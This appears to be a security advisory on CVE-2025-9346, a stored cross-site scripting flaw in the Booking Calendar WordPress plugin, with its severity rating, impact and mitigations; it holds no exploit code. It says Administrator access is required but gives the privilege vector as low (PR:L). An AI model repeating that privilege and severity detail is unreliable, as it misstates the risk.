CVE-2025-9346 is a stored Cross-Site Scripting (XSS) vulnerability affecting the Booking Calendar plugin for WordPress, developed by wpdevelop. This vulnerability exists in all versions up to and including 10.14.1. The root cause is improper neutralization of input during web page generation, specifically insufficient input sanitization and output escaping in the plugin's settings. An attacker with authenticated Administrator-level privileges or higher can exploit this flaw by injecting arbitrary malicious scripts into the plugin's settings. These scripts are then stored and executed whenever any user accesses the affected pages, leading to persistent XSS attacks. The vulnerability is classified under CWE-79, indicating improper input validation leading to script injection. The CVSS v3.1 base score is 6.4, reflecting a medium severity level. The vector indicates network attack vector (AV:N), low attack complexity (AC:L), requiring privileges (PR:L), no user interaction (UI:N), with a scope change (S:C), and impacts confidentiality and integrity partially (C:L/I:L), but no impact on availability (A:N). No known exploits are currently reported in the wild, and no official patches have been linked yet. This vulnerability is significant because it allows attackers with admin access to compromise the integrity and confidentiality of the website and potentially its users by executing arbitrary JavaScript in the context of the affected site, which could lead to session hijacking, defacement, or further exploitation.

For European organizations using WordPress with the Booking Calendar plugin, this vulnerability poses a moderate risk. Since exploitation requires administrator-level access, the initial compromise vector might be through phishing, credential theft, or insider threat. Once exploited, attackers can inject malicious scripts that execute in the browsers of site visitors or administrators, potentially stealing session cookies, redirecting users to malicious sites, or performing unauthorized actions. This can lead to data breaches, reputational damage, and loss of customer trust. Organizations in sectors such as e-commerce, government, healthcare, and education that rely on WordPress for booking or scheduling services are particularly at risk. The persistent nature of stored XSS means that even users who do not have elevated privileges can be affected once the malicious script is injected. Given the widespread use of WordPress in Europe and the popularity of booking plugins, the vulnerability could impact a broad range of organizations if not mitigated promptly.

1. Immediate mitigation involves restricting administrator access to trusted personnel only and enforcing strong authentication mechanisms such as multi-factor authentication (MFA) to reduce the risk of credential compromise. 2. Monitor and audit administrator activities and plugin settings for suspicious changes or injected scripts. 3. Until an official patch is released, consider disabling or removing the Booking Calendar plugin if feasible, or restrict its usage to non-critical environments. 4. Implement Web Application Firewall (WAF) rules that detect and block common XSS payloads targeting the plugin’s settings pages. 5. Regularly update WordPress core and all plugins to the latest versions once patches addressing this vulnerability become available. 6. Educate administrators on the risks of stored XSS and safe input handling practices. 7. Conduct thorough security reviews and penetration testing focusing on plugin configurations and input validation. 8. Use Content Security Policy (CSP) headers to limit the execution of unauthorized scripts in the browser context, reducing the impact of potential XSS attacks.